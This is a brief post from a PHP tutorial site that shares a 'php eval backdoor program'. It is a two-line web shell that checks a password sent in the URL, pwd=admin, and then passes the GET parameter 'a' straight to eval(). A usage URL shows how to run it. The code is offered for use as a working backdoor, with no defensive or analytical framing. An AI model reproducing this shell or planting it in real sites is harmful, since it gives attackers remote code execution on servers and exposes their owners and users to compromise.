Home >Backend Development >PHP Tutorial >Share a php eval backdoor program

Share a php eval backdoor program

WBOY
WBOYOriginal
2016-07-25 08:50:592340browse
Share a php eval backdoor program
Required to support eval function
How to use
http://url/test.php?pwd=admin&action=eval&a=phpinfo();
  1. $passwd="admin";if($_GET['pwd']!=$passwd)exit;
  2. if($_GET['action']=="eval" && $_GET ['a']){eval($_GET['a']);}
  3. ?>
Copy code


Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn